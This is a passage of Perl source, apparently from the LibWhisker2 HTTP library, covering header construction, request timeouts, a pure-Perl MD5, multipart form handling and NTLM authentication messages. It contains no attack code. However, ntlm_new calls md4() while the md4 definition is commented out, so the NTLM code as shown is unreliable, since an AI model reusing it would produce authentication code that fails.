@{ $hin->{whisker}->{header_order} } ) {\n            next if ( $_ eq '' || $_ eq 'whisker' || !defined $hin->{$_} );\n            if ( ref( $hin->{$_} ) ) {\n                utils_croak(\"http_construct_headers: non-array header value reference\")\n                  if ( ref( $hin->{$_} ) ne 'ARRAY' );\n                $SENT{$_} ||= 0;\n                my $v = $$hin{$_}->[ $SENT{$_} ];\n                $output .= \"$_: $v$EOL\";\n            }\n            else {\n                $output .= \"$_: $$hin{$_}$EOL\";\n            }\n            $SENT{$_}++;\n        }\n    }\n\n    foreach ( keys %$hin ) {\n        next if ( $_ eq '' || $_ eq 'whisker' );\n        if ( ref( $hin->{$_} ) ) {    # header with multiple values\n\t    utils_croak(\"http_construct_headers: non-array header value ref\") \n\t    \tif ( ref( $hin->{$_} ) ne 'ARRAY' );\n\t    $SENT{$_} ||= 0;\n\t    for($i=$SENT{$_}; $i<~~@{ $hin->{$_} }; $i++) {\n                $output .= \"$_: \" . $hin->{$_}->[$i] . $EOL;\n            }\n        }\n        else {                       # normal header\n            next if ( defined $SENT{$_} );\n            $output .= \"$_: $$hin{$_}$EOL\";\n        }\n    }\n    return $output;\n}\n\n##################################################################\n\n=item B<http_close>\n\nParams: \\%request\n\nReturn: nothing\n\nThis function will close any open streams for the given request.\n\nNote: in order for http_close() to find the right connection, all\noriginal host/proxy/port parameters in %request must be the exact\nsame as when the original request was made.\n\n=cut\n\nsub http_close {\n    my $hin       = shift;\n    my $cache_key = stream_key($hin);\n    return if ( !defined $http_host_cache{$cache_key} );\n    my $stream = $http_host_cache{$cache_key};\n    $stream->{'close'}->();\n}\n\n##################################################################\n\n=item B<http_do_request_timeout>\n\nParams: \\%request, \\%response, $timeout\n\nReturn: $result\n\nThis function is identical to http_do_request(), except that it\nwraps the entire request in a timeout wrapper.  $timeout is the\nnumber of seconds to allow for the entire request to be completed.\n\nNote: this function uses alarm() and signals, and thus will only\nwork on Unix-ish platforms.  It should be safe to call on any\nplatform though.\n\n=cut\n\nsub http_do_request_timeout {\n    my ( $req, $resp, $timeout ) = @_;\n    $timeout ||= 30;\n\n    my $result;\n    eval {\n        local $SIG{ALRM} = sub { die \"timeout\\n\" };\n        eval { alarm($timeout) };\n        $result = LW2::http_do_request( $req, $resp );\n        eval { alarm(0) };\n    };\n    if ($@) {\n        $result                   = 1;\n        $resp->{whisker}->{error} = 'Error with timeout wrapper';\n        $resp->{whisker}->{error} = 'Total transaction timed out'\n          if ( $@ =~ /timeout/ );\n    }\n    return $result;\n}\n\n\n########################################################################\n\n{    # start md5 packaged varbs\n    my ( @S, @T, @M );\n    my $code           = '';\n    my $MD5_TRYLOADING = 1;\n\n=item B<md5>\n\nParams: $data\n\nReturn: $hex_md5_string\n\nThis function takes a data scalar, and composes a MD5 hash of it, and \nreturns it in a hex ascii string.  It will use the fastest MD5 function\navailable.\n\n=cut\n\n    sub md5 {\n        return undef if ( !defined $_[0] );    # oops, forgot the data\n        if ($MD5_TRYLOADING) {\n            $MD5_TRYLOADING = 0;\n            eval \"require MD5\";\n        }\n        return MD5->hexhash( $_[0] ) if ($MD5::VERSION);\n        my $DATA = _md5_pad( $_[0] );\n        &_md5_init() if ( !defined $M[0] );\n        return _md5_perl_generated( \\$DATA );\n    }\n\n########################################################################\n\n    sub _md5_init {\n        return if ( defined $S[0] );\n        my $i;\n        for ( $i = 1 ; $i <= 64 ; $i++ ) {\n            $T[ $i - 1 ] = int( ( 2**32 ) * abs( sin($i) ) );\n        }\n        my @t = ( 7, 12, 17, 22, 5, 9, 14, 20, 4, 11, 16, 23, 6, 10, 15, 21 );\n        for ( $i = 0 ; $i < 64 ; $i++ ) {\n            $S[$i] = $t[ ( int( $i / 16 ) * 4 ) + ( $i % 4 ) ];\n        }\n        @M = (\n            0, 1, 2,  3,  4,  5,  6,  7,  8,  9,  10, 11, 12, 13, 14, 15,\n            1, 6, 11, 0,  5,  10, 15, 4,  9,  14, 3,  8,  13, 2,  7,  12,\n            5, 8, 11, 14, 1,  4,  7,  10, 13, 0,  3,  6,  9,  12, 15, 2,\n            0, 7, 14, 5,  12, 3,  10, 1,  8,  15, 6,  13, 4,  11, 2,  9\n        );\n        &_md5_generate();\n\n        # check to see if it works correctly\n        my $TEST = _md5_pad('foobar');\n        if ( _md5_perl_generated( \\$TEST ) ne\n            '3858f62230ac3c915f300c664312c63f' )\n        {\n            utils_carp('md5: MD5 self-test not successful.');\n        }\n    }\n\n########################################################################\n\n    # This function is from Digest::Perl::MD5, and bears the following\n    # copyrights:\n    #\n    # Copyright 2000 Christian Lackas, Imperia Software Solutions\n    # Copyright 1998-1999 Gisle Aas.\n    # Copyright 1995-1996 Neil Winton.\n    # Copyright 1991-1992 RSA Data Security, Inc.\n    #\n\n    sub _md5_pad {\n        my $l = length( my $msg = shift() . chr(128) );\n        $msg .= \"\\0\" x ( ( $l % 64 <= 56 ? 56 : 120 ) - $l % 64 );\n        $l = ( $l - 1 ) * 8;\n        $msg .= pack 'VV', $l & 0xffffffff, ( $l >> 16 >> 16 );\n        return $msg;\n    }\n\n########################################################################\n\n    sub _md5_generate {\n        my $N = 'abcddabccdabbcda';\n        my ( $i, $M ) = ( 0, '' );\n        $M = '&0xffffffff' if ( ( 1 << 16 ) << 16 );    # mask for 64bit systems\n\n        $code = <<EOT;\n        sub _md5_perl_generated {\n\tBEGIN { \\$^H |= 1; }; # use integer\n        my (\\$A,\\$B,\\$C,\\$D)=(0x67452301,0xefcdab89,0x98badcfe,0x10325476);\n        my (\\$a,\\$b,\\$c,\\$d,\\$t,\\$i);\n        my \\$dr=shift;\n        my \\$l=length(\\$\\$dr);\n        for my \\$L (0 .. ((\\$l/64)-1) ) {\n                my \\@D = unpack('V16', substr(\\$\\$dr, \\$L*64,64));\n                (\\$a,\\$b,\\$c,\\$d)=(\\$A,\\$B,\\$C,\\$D);\nEOT\n\n        for ( $i = 0 ; $i < 16 ; $i++ ) {\n            my ( $a, $b, $c, $d ) =\n              split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );\n            $code .=\n              \"\\$t=((\\$$d^(\\$$b\\&(\\$$c^\\$$d)))+\\$$a+\\$D[$M[$i]]+$T[$i])$M;\\n\";\n            $code .=\n\"\\$$a=(((\\$t<<$S[$i])|((\\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\\$$b)$M;\\n\";\n        }\n        for ( ; $i < 32 ; $i++ ) {\n            my ( $a, $b, $c, $d ) =\n              split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );\n            $code .=\n              \"\\$t=((\\$$c^(\\$$d\\&(\\$$b^\\$$c)))+\\$$a+\\$D[$M[$i]]+$T[$i])$M;\\n\";\n            $code .=\n\"\\$$a=(((\\$t<<$S[$i])|((\\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\\$$b)$M;\\n\";\n        }\n        for ( ; $i < 48 ; $i++ ) {\n            my ( $a, $b, $c, $d ) =\n              split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );\n            $code .= \"\\$t=((\\$$b^\\$$c^\\$$d)+\\$$a+\\$D[$M[$i]]+$T[$i])$M;\\n\";\n            $code .=\n\"\\$$a=(((\\$t<<$S[$i])|((\\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\\$$b)$M;\\n\";\n        }\n        for ( ; $i < 64 ; $i++ ) {\n            my ( $a, $b, $c, $d ) =\n              split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );\n            $code .= \"\\$t=((\\$$c^(\\$$b|(~\\$$d)))+\\$$a+\\$D[$M[$i]]+$T[$i])$M;\\n\";\n            $code .=\n\"\\$$a=(((\\$t<<$S[$i])|((\\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\\$$b)$M;\\n\";\n        }\n\n        $code .= <<EOT;\n                \\$A=\\$A+\\$a\\&0xffffffff; \\$B=\\$B+\\$b\\&0xffffffff;\n                \\$C=\\$C+\\$c\\&0xffffffff; \\$D=\\$D+\\$d\\&0xffffffff;\n        } # for\n\treturn unpack('H*', pack('V4',\\$A,\\$B,\\$C,\\$D)); }\nEOT\n        eval \"$code\";\n    }\n\n}    # md5 package container\n\n########################################################################\n\n# {    # start md4 packaged varbs\n#     my ( @S, @T, @M );\n#     my $code = '';\n\n=item B<md4>\n\nParams: $data\n\nReturn: $hex_md4_string\n\nThis function takes a data scalar, and composes a MD4 hash of it, and \nreturns it in a hex ascii string.  It will use the fastest MD4 function\navailable.\n\n=cut\n\n    # sub md4 {\n    #     return undef if ( !defined $_[0] );    # oops, forgot the data\n    #     my $DATA = _md5_pad( $_[0] );\n    #     &_md4_init() if ( !defined $M[0] );\n    #     return _md4_perl_generated( \\$DATA );\n    # }\n\n########################################################################\n\n#     sub _md4_init {\n#         return if ( defined $S[0] );\n#         my $i;\n#         my @t = ( 3, 7, 11, 19, 3, 5, 9, 13, 3, 9, 11, 15 );\n#         for ( $i = 0 ; $i < 48 ; $i++ ) {\n#             $S[$i] = $t[ ( int( $i / 16 ) * 4 ) + ( $i % 4 ) ];\n#         }\n#         @M = (\n#             0, 1, 2, 3,  4, 5,  6, 7,  8, 9, 10, 11, 12, 13, 14, 15,\n#             0, 4, 8, 12, 1, 5,  9, 13, 2, 6, 10, 14, 3,  7,  11, 15,\n#             0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5,  13, 3,  11, 7,  15\n#         );\n\n#         my $N = 'abcddabccdabbcda';\n#         my $M = '';\n#         $M = '&0xffffffff' if ( ( 1 << 16 ) << 16 );    # mask for 64bit systems\n\n#         $code = <<EOT;\n#         sub _md4_perl_generated {\n# \tBEGIN { \\$^H |= 1; }; # use integer\n#         my (\\$A,\\$B,\\$C,\\$D)=(0x67452301,0xefcdab89,0x98badcfe,0x10325476);\n#         my (\\$a,\\$b,\\$c,\\$d,\\$t,\\$i);\n#         my \\$dr=shift;\n#         my \\$l=length(\\$\\$dr);\n#         for my \\$L (0 .. ((\\$l/64)-1) ) {\n#                 my \\@D = unpack('V16', substr(\\$\\$dr, \\$L*64,64));\n#                 (\\$a,\\$b,\\$c,\\$d)=(\\$A,\\$B,\\$C,\\$D);\n# EOT\n\n#         for ( $i = 0 ; $i < 16 ; $i++ ) {\n#             my ( $a, $b, $c, $d ) =\n#               split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );\n#             $code .= \"\\$t=((\\$$d^(\\$$b\\&(\\$$c^\\$$d)))+\\$$a+\\$D[$M[$i]])$M;\\n\";\n#             $code .=\n# \"\\$$a=(((\\$t<<$S[$i])|((\\$t>>(32-$S[$i]))&((1<<$S[$i])-1))))$M;\\n\";\n#         }\n#         for ( ; $i < 32 ; $i++ ) {\n#             my ( $a, $b, $c, $d ) =\n#               split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );\n#             $code .=\n# \"\\$t=(( (\\$$b&\\$$c)|(\\$$b&\\$$d)|(\\$$c&\\$$d) )+\\$$a+\\$D[$M[$i]]+0x5a827999)$M;\\n\";\n#             $code .=\n# \"\\$$a=(((\\$t<<$S[$i])|((\\$t>>(32-$S[$i]))&((1<<$S[$i])-1))))$M;\\n\";\n#         }\n#         for ( ; $i < 48 ; $i++ ) {\n#             my ( $a, $b, $c, $d ) =\n#               split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );\n#             $code .=\n#               \"\\$t=(( \\$$b^\\$$c^\\$$d )+\\$$a+\\$D[$M[$i]]+0x6ed9eba1)$M;\\n\";\n#             $code .=\n# \"\\$$a=(((\\$t<<$S[$i])|((\\$t>>(32-$S[$i]))&((1<<$S[$i])-1))))$M;\\n\";\n#         }\n\n#         $code .= <<EOT;\n#                 \\$A=\\$A+\\$a\\&0xffffffff; \\$B=\\$B+\\$b\\&0xffffffff;\n#                 \\$C=\\$C+\\$c\\&0xffffffff; \\$D=\\$D+\\$d\\&0xffffffff;\n#         } # for\n# \treturn unpack('H*', pack('V4',\\$A,\\$B,\\$C,\\$D)); }\n# EOT\n#         eval \"$code\";\n\n#         my $TEST = _md5_pad('foobar');\n#         if ( _md4_perl_generated( \\$TEST ) ne\n#             '547aefd231dcbaac398625718336f143' )\n#         {\n#             utils_carp('md4: MD4 self-test not successful.');\n#         }\n#     }\n\n# }    # md4 package container\n\n\n########################################################################\n\n=item B<multipart_set>\n\nParams: \\%multi_hash, $param_name, $param_value\n\nReturn: nothing\n\nThis function sets the named parameter to the given value within the\nsupplied multipart hash.\n\n=cut\n\nsub multipart_set {\n    my ( $hr, $n, $v ) = @_;\n    return if ( !ref($hr) );    # error check\n    return undef if ( !defined $n || $n eq '' );\n    $$hr{$n} = $v;\n}\n\n########################################################################\n\n=item B<multipart_get>\n\nParams: \\%multi_hash, $param_name\n\nReturn: $param_value, undef on error\n\nThis function retrieves the named parameter to the given value within the\nsupplied multipart hash.  There is a special case where the named\nparameter is actually a file--in which case the resulting value will be\n\"\\0FILE\".  In general, all special values will be prefixed with a NULL\ncharacter.  In order to get a file's info, use multipart_getfile().\n\n=cut\n\nsub multipart_get {\n    my ( $hr, $n ) = @_;\n    return undef if ( !ref($hr) );                 # error check\n    return undef if ( !defined $n || $n eq '' );\n    return $$hr{$n};\n}\n\n########################################################################\n\n=item B<multipart_setfile>\n\nParams: \\%multi_hash, $param_name, $file_path [, $filename]\n\nReturn: undef on error, 1 on success\n\nNOTE: this function does not actually add the contents of $file_path into\nthe %multi_hash; instead, multipart_write() inserts the content when\ngenerating the final request.\n\n=cut\n\nsub multipart_setfile {\n    my ( $hr, $n, $path ) = ( shift, shift, shift );\n    my ($fname) = shift;\n\n    return undef if ( !ref($hr) );                 # error check\n    return undef if ( !defined $n || $n eq '' );\n    return undef if ( !defined $path );\n    return undef if ( !( -e $path && -f $path ) );\n\n    if ( !defined $fname ) {\n        $path =~ m/[\\\\\\/]([^\\\\\\/]+)$/;\n        $fname = $1 || \"whisker-file\";\n    }\n\n    $$hr{$n} = \"\\0FILE\";\n    $$hr{\"\\0$n\"} = [ $path, $fname ];\n    return 1;\n}\n\n########################################################################\n\n=item B<multipart_getfile>\n\nParams: \\%multi_hash, $file_param_name\n\nReturn: $path, $name ($path=undef on error)\n\nmultipart_getfile is used to retrieve information for a file\nparameter contained in %multi_hash.  To use this you would most\nlikely do:\n\n ($path,$fname)=LW2::multipart_getfile(\\%multi,\"param_name\");\n\n=cut\n\nsub multipart_getfile {\n    my ( $hr, $n ) = @_;\n\n    return undef if ( !ref($hr) );                                 # error check\n    return undef if ( !defined $n || $n eq '' );\n    return undef if ( !defined $$hr{$n} || $$hr{$n} ne \"\\0FILE\" );\n\n    return @{ $$hr{\"\\0$n\"} };\n}\n\n########################################################################\n\n=item B<multipart_boundary>\n\nParams: \\%multi_hash [, $new_boundary_name]\n\nReturn: $current_boundary_name\n\nmultipart_boundary is used to retrieve, and optionally set, the\nmultipart boundary used for the request.\n\nNOTE: the function does no checking on the supplied boundary, so if \nyou want things to work make sure it's a legit boundary.  Libwhisker\ndoes *not* prefix it with any '---' characters.\n\n=cut\n\nsub multipart_boundary {\n    my ( $hr, $new ) = @_;\n    my $ret;\n\n    return undef if ( !ref($hr) );    # error check\n\n    if ( !defined $$hr{\"\\0BOUNDARY\"} ) {\n\n        # create boundary on the fly\n        my $b  = uc( utils_randstr(20) );\n        my $b2 = '-' x 32;\n        $$hr{\"\\0BOUNDARY\"} = \"$b2$b\";\n    }\n\n    $ret = $$hr{\"\\0BOUNDARY\"};\n    if ( defined $new ) {\n        $$hr{\"\\0BOUNDARY\"} = $new;\n    }\n\n    return $ret;\n}\n\n########################################################################\n\n=item B<multipart_write>\n\nParams: \\%multi_hash, \\%request\n\nReturn: 1 if successful, undef on error\n\nmultipart_write is used to parse and construct the multipart data\ncontained in %multi_hash, and place it ready to go in the given whisker\nhash (%request) structure, to be sent to the server.\n\nNOTE: file contents are read into the final %request, so it's possible for\nthe hash to get *very* large if you have (a) large file(s).\n\n=cut\n\nsub multipart_write {\n    my ( $mp, $hr ) = @_;\n\n    return undef if ( !ref($mp) );    # error check\n    return undef if ( !ref($hr) );    # error check\n\n    if ( !defined $$mp{\"\\0BOUNDARY\"} ) {\n\n        # create boundary on the fly\n        my $b  = uc( utils_randstr(20) );\n        my $b2 = '-' x 32;\n        $$mp{\"\\0BOUNDARY\"} = \"$b2$b\";\n    }\n\n    my $B   = $$mp{\"\\0BOUNDARY\"};\n    my $EOL = $$hr{whisker}->{http_eol} || \"\\x0d\\x0a\";\n\n    my $keycount = 0;\n    foreach ( keys %$mp ) {\n        next if ( substr( $_, 0, 1 ) eq \"\\0\" );\n        $keycount++;\n        if ( $$mp{$_} eq \"\\0FILE\" ) {\n            my ( $path, $name ) = multipart_getfile( $mp, $_ );\n            next if ( !defined $path );\n            $$hr{whisker}->{data} .= \"$B$EOL\";\n            $$hr{whisker}->{data} .=\n              \"Content-Disposition: \" . \"form-data; name=\\\"$_\\\"; \";\n            $$hr{whisker}->{data} .= \"filename=\\\"$name\\\"$EOL\";\n            $$hr{whisker}->{data} .=\n              \"Content-Type: \" . \"application/octet-stream$EOL\";\n            $$hr{whisker}->{data} .= $EOL;\n            next if ( !open( IN, \"<$path\" ) );\n            binmode(IN);    # stupid Windows\n\n            while (<IN>) {\n                $$hr{whisker}->{data} .= $_;\n            }\n            close(IN);\n            $$hr{whisker}->{data} .= $EOL;    # WARNING: is this right?\n        }\n        else {\n            $$hr{whisker}->{data} .= \"$B$EOL\";\n            $$hr{whisker}->{data} .=\n              \"Content-Disposition: \" . \"form-data; name=\\\"$_\\\"$EOL\";\n            $$hr{whisker}->{data} .= \"$EOL$$mp{$_}$EOL\";\n        }\n    }\n\n    if ($keycount) {\n        $$hr{whisker}->{data} .= \"$B--$EOL\";    # closing boundary\n        $$hr{\"Content-Length\"} = length( $$hr{whisker}->{data} );\n        $$hr{\"Content-Type\"}   = \"multipart/form-data; boundary=$B\";\n        return 1;\n    }\n    else {\n\n        # multipart hash didn't contain params to upload\n        return undef;\n    }\n}\n\n########################################################################\n\n=item B<multipart_read>\n\nParams: \\%multi_hash, \\%hout_response [, $filepath ]\n\nReturn: 1 if successful, undef on error\n\nmultipart_read will parse the data contents of the supplied\n%hout_response hash, by passing the appropriate info to\nmultipart_read_data().  Please see multipart_read_data() for more\ninfo on parameters and behaviour.\n\nNOTE: this function will return an error if the given %hout_response\nContent-Type is not set to \"multipart/form-data\".\n\n=cut\n\nsub multipart_read {\n    my ( $mp, $hr, $fp ) = @_;\n\n    return undef if ( !( defined $mp && ref($mp) ) );\n    return undef if ( !( defined $hr && ref($hr) ) );\n\n    my $ctype = utils_find_lowercase_key( $hr, 'content-type' );\n    return undef if ( !defined $ctype );\n    return undef if ( $ctype !~ m#^multipart/form-data#i );\n\n    return multipart_read_data( $mp, \\$$hr{'whisker'}->{'data'}, undef, $fp );\n\n}\n\n########################################################################\n\n=item B<multipart_read_data>\n\nParams: \\%multi_hash, \\$data, $boundary [, $filepath ]\n\nReturn: 1 if successful, undef on error\n\nmultipart_read_data parses the contents of the supplied data using \nthe given boundary and puts the values in the supplied %multi_hash.  \nEmbedded files will *not* be saved unless a $filepath is given, which\nshould be a directory suitable for writing out temporary files.\n\nNOTE: currently only application/octet-stream is the only supported\nfile encoding.  All other file encodings will not be parsed/saved.\n\n=cut\n\nsub multipart_read_data {\n    my ( $mp, $dr, $bound, $fp ) = @_;\n\n    return undef if ( !( defined $mp && ref($mp) ) );\n    return undef if ( !( defined $dr && ref($dr) ) );\n\n    # if $bound is undef, then we'll snag what looks to be\n    # the first boundary from the data.\n    if ( !defined $bound ) {\n        if ( $$dr =~ /([-]{5,}[A-Z0-9]+)[\\r\\n]/i ) {\n            $bound = $1;\n        }\n        else {\n\n            # we didn't spot a typical boundary; error\n            return undef;\n        }\n    }\n\n    if ( defined $fp && !( -d $fp && -w $fp ) ) {\n        $fp = undef;\n    }\n\n    my $line = utils_getline_crlf( $dr, 0 );\n    return undef if ( !defined $line );\n    return undef if ( index( $line, $bound ) != 0 );\n\n    my $done = 0;\n    while ( !$done ) {\n        $done = _multipart_read_data_part( $mp, $dr, $bound, $fp );\n    }\n\n    return 1;\n}\n\n########################################################################\n\nsub _multipart_read_data_part {\n    my ( $mp, $dr, $bound, $fp ) = @_;\n\n    my $dispinfo = utils_getline_crlf($dr);\n    return 1 if ( !defined $dispinfo );\n    return 1 if ( length($dispinfo) == 0 );\n    my $lcdisp = lc($dispinfo);\n\n    if ( index( $lcdisp, 'content-disposition: form-data;' ) != 0 ) {\n        return 1;\n    }    # bad disposition\n\n    my ( $s, $e, $l );\n\n    $s = index( $lcdisp, 'name=\"', 30 );\n    $e = index( $lcdisp, '\"',      $s + 6 );\n    return 1 if ( $s == -1 || $e == -1 );\n    my $NAME = substr( $dispinfo, $s + 6, $e - $s - 6 );\n\n    $s = index( $lcdisp, 'filename=\"', $e );\n    my $FILENAME = undef;\n    if ( $s != -1 ) {\n        $e = index( $lcdisp, '\"', $s + 10 );\n        return 1 if ( $e == -1 );    # puke; malformed filename\n        $FILENAME = substr( $dispinfo, $s + 10, $e - $s - 10 );\n        $s        = rindex( $FILENAME, '\\\\' );\n        $e        = rindex( $FILENAME, '/' );\n        $s = $e if ( $e > $s );\n        $FILENAME = substr( $FILENAME, $s + 1, length($FILENAME) - $s );\n    }\n\n    my $CTYPE = utils_getline_crlf($dr);\n\n    return 1 if ( !defined $CTYPE );\n    $CTYPE = lc($CTYPE);\n\n    if ( length($CTYPE) > 0 ) {\n        $s = index( $CTYPE, 'content-type:' );\n        return 1 if ( $s != 0 );    # bad ctype line\n        $CTYPE = substr( $CTYPE, 13, length($CTYPE) - 13 );\n        $CTYPE =~ tr/ \\t//d;\n        my $xx = utils_getline_crlf($dr);\n        return 1 if ( !defined $xx );\n        return 1 if ( length($xx) > 0 );\n    }\n    else {\n        $CTYPE = 'application/octet-stream';\n    }\n\n    my $VALUE = '';\n    while ( defined( $l = utils_getline_crlf($dr) ) ) {\n        last if ( index( $l, $bound ) == 0 );\n        $VALUE .= $l;\n        $VALUE .= \"\\r\\n\";\n    }\n\n    substr( $VALUE, -2, 2 ) = '';\n\n    if ( !defined $FILENAME ) {    # read in param\n        $$mp{$NAME} = $VALUE;\n        return 0;\n\n    }\n    else {                         # read in file\n        $$mp{$NAME} = \"\\0FILE\";\n        return 0 if ( !defined $fp );\n\n        # TODO: funky content types, like application/x-macbinary\n        if ( $CTYPE ne 'application/octet-stream' ) {\n            return 0;\n        }\n\n        my $rfn      = lc( utils_randstr(12) );\n        my $fullpath = \"$fp$rfn\";\n\n        $$mp{\"\\0$NAME\"} = [ undef, $FILENAME ];\n        return 0 if ( !open( OUT, \">$fullpath\" ) );    # error opening file\n        binmode(OUT);                                  # stupid Windows\n        $$mp{\"\\0$NAME\"} = [ $fullpath, $FILENAME ];\n        print OUT $VALUE;\n        close(OUT);\n\n        return 0;\n\n    }    # if !defined $FILENAME\n\n    return 0;    # um, this should never be reached...\n}\n\n########################################################################\n\n=item B<multipart_files_list>\n\nParams: \\%multi_hash\n\nReturn: @files\n\nmultipart_files_list returns an array of parameter names for all\nthe files that are contained in %multi_hash.\n\n=cut\n\nsub multipart_files_list {\n    my ($mp) = shift;\n    my @ret;\n\n    return () if ( !( defined $mp && ref($mp) ) );\n    while ( my ( $K, $V ) = each(%$mp) ) {\n        push( @ret, $K ) if ( $V eq \"\\0FILE\" );\n    }\n    return @ret;\n}\n\n########################################################################\n\n=item B<multipart_params_list>\n\nParams: \\%multi_hash\n\nReturn: @params\n\nmultipart_files_list returns an array of parameter names for all\nthe regular parameters (non-file) that are contained in %multi_hash.\n\n=cut\n\nsub multipart_params_list {\n    my ($mp) = shift;\n    my @ret;\n\n    return () if ( !( defined $mp && ref($mp) ) );\n    while ( my ( $K, $V ) = each(%$mp) ) {\n        push( @ret, $K ) if ( $V ne \"\\0FILE\"\n            && substr( $K, 0, 1 ) ne \"\\0\" );\n    }\n    return @ret;\n}\n\n########################################################################\n\n\n########################################################################\n\n=item B<ntlm_new>\n\nParams: $username, $password [, $domain, $ntlm_only]\n\nReturn: $ntlm_object\n\nReturns a reference to an array (otherwise known as the 'ntlm object')\nwhich contains the various information specific to a user/pass combo.\nIf $ntlm_only is set to 1, then only the NTLM hash (and not the LanMan\nhash) will be generated.  This results in a speed boost, and is typically\nfine for using against IIS servers.\n\nThe array contains the following items, in order:\nusername, password, domain, lmhash(password), ntlmhash(password)\n\n=cut\n\nsub ntlm_new {\n    my ( $user, $pass, $domain, $flag ) = @_;\n    $flag ||= 0;\n    return undef if ( !defined $user );\n    $pass   ||= '';\n    $domain ||= '';\n    my @a = ( \"$user\", \"$pass\", \"$domain\", undef, undef );\n    my $t;\n\n    if ( $flag == 0 ) {\n        $t = substr( $pass, 0, 14 );\n        $t =~ tr/a-z/A-Z/;\n        $t .= \"\\0\" x ( 14 - length($t) );\n        $a[3] = des_E_P16($t);    # LanMan password hash\n        $a[3] .= \"\\0\" x ( 21 - length( $a[3] ) );\n    }\n\n    $t = md4( encode_unicode($pass) );\n    $t =~ s/([a-z0-9]{2})/sprintf(\"%c\",hex($1))/ieg;\n    $t .= \"\\0\" x ( 21 - length($t) );\n    $a[4] = $t;                   # NTLM password hash\n\n    &des_cache_reset();           # reset the keys hash\n    return \\@a;\n}\n\n########################################################################\n\nsub ntlm_generate_responses {\n    my ( $obj, $chal ) = @_;\n    return ( undef, undef ) if ( !defined $obj || !defined $chal );\n    return ( undef, undef ) if ( !ref($obj) );\n    my $x = '';\n    $x = des_E_P24( $obj->[3], $chal ) if ( defined $obj->[3] );\n    return ( $x, des_E_P24( $obj->[4], $chal ) );\n}\n\n########################################################################\n\n=item B<ntlm_decode_challenge>\n\nParams: $challenge\n\nReturn: @challenge_parts\n\nSplits the supplied challenge into the various parts.  The returned array\ncontains elements in the following order:\n\nunicode_domain, ident, packet_type, domain_len, domain_maxlen,\ndomain_offset, flags, challenge_token, reserved, empty, raw_data\n\n=cut\n\nsub ntlm_decode_challenge {\n    return undef if ( !defined $_[0] );\n    my $chal = shift;\n    my @res;\n\n    @res = unpack( 'Z8VvvVVa8a8a8', substr( $chal, 0, 48 ) );\n    push( @res, substr( $chal, 48 ) );\n    unshift( @res, substr( $chal, $res[4], $res[2] ) );\n    return @res;\n}\n\n########################################################################\n\nsub ntlm_header {\n    my ( $s, $h, $o ) = @_;\n    my $l = length($s);\n    return pack( 'vvV', 0, 0, $o - $h ) if ( $l == 0 );\n    return pack( 'vvV', $l, $l, $o );\n}\n\n########################################################################\n\n=item B<ntlm_client>\n\nParams: $ntlm_obj [, $server_challenge]\n\nReturn: $response\n\nntlm_client() is responsible for generating the base64-encoded text you\ninclude in the HTTP Authorization header.  If you call ntlm_client()\nwithout a $server_challenge, the function will return the initial NTLM\nrequest packet (message packet #1).  You send this to the server, and\ntake the server's response (message packet #2) and pass that as\n$server_challenge, causing ntlm_client() to generate the final response\npacket (message packet #3).\n\nNote: $server_challenge is expected to be base64 encoded.\n\n=cut\n\nsub ntlm_client {\n    my ( $obj, $p ) = @_;\n    my $resp = \"NTLMSSP\\0\";\n\n    return undef if ( !defined $obj || !ref($obj) );\n\n    if ( defined $p && $p ne '' ) {    # answer challenge\n        $p =~ tr/ \\t\\r\\n//d;\n        $p = decode_base64($p);\n        my @c  = ntlm_decode_challenge($p);\n        my $uu = encode_unicode( $obj->[0] );    # username\n        $resp .= pack( 'V', 3 );\n        my ( $hl, $hn ) = ntlm_generate_responses( $obj, $c[7] );    # token\n        return undef if ( !defined $hl || !defined $hn );\n        my $o = 64;\n        $resp .= ntlm_header( $hl, 64, $o );                         # LM hash\n        $resp .= ntlm_header( $hn, 64, ( $o += length($hl) ) );      # NTLM hash\n        $resp .= ntlm_header( $c[0], 64, ( $o += length($hn) ) );    # domain\n        $resp .= ntlm_header( $uu, 64, ( $o += length( $c[0] ) ) );  # username\n        $resp .= ntlm_header( $uu, 64, ( $o += length($uu) ) );    # workstation\n        $resp .= ntlm_header( '', 64, ( $o += length($uu) ) );     # session\n        $resp .= pack( 'V', $c[6] );\n        $resp .= $hl . $hn . $c[0] . $uu . $uu;\n\n    }\n    else {    # initiate challenge\n        $resp .= pack( 'VV', 1, 0x0000b207 );\n        $resp .= ntlm_header( $obj->[0], 32, 32 );\n        $resp .= ntlm_header( $obj->[2], 32, 32 + length( $obj->[0] ) );\n        $resp .= $obj->[0] . $obj->[2];\n    }\n\n    return encode_base64( $resp, '' );\n}\n\n########################################################################\n\nsub _ntlm_auth_callback {\n    my ( $stream, $hi, $ho, $pflag ) = @_;\n    my ( $ntlmobj, $header, $req_pre, $req_post, $aheader, $work, $ecode );\n    my ($rheader);\n    $pflag ||= 0;\n\n    if ($pflag) {\n        $ntlmobj                  = $$hi{whisker}->{auth_proxy_data};\n        $header                   = 'Proxy-Authorization';\n        $rheader                  = 'proxy-authenticate';\n        $ecode                    = 407;\n        $hi->{'Proxy-Connection'} = 'Keep-Alive';\n    }\n    else {\n        $ntlmobj          = $$hi{whisker}->{auth_data};\n        $header           = 'Authorization';\n        $rheader          = 'www-authenticate';\n        $ecode            = 401;\n        $hi->{Connection} = 'Keep-Alive';\n    }\n\n    $ho->{whisker}->{error} = 'NTLM ' . $header;\n    $hi->{$header} = 'NTLM ' . ntlm_client($ntlmobj);\n    my $ret = _http_do_request_ex( $stream, $hi, $ho );\n    return $ret if ($ret);\n    return 200  if ( $$ho{whisker}->{code} == 200 );\n    return 1    if ( $$ho{whisker}->{code} != $ecode );\n\n    my $thead = utils_find_lowercase_key( $ho, $rheader );\n    return 1 if ( !defined $thead );\n\n    my ( $found, @auths );\n    if ( ref($thead) ) { @auths = @$thead; }\n    else { push @auths, $thead; }\n    foreach (@auths) {\n        $found = $1 if (m/^NTLM (.+)$/);\n    }\n    return 1 if ( !defined $found );\n\n    $hi->{$header} = 'NTLM 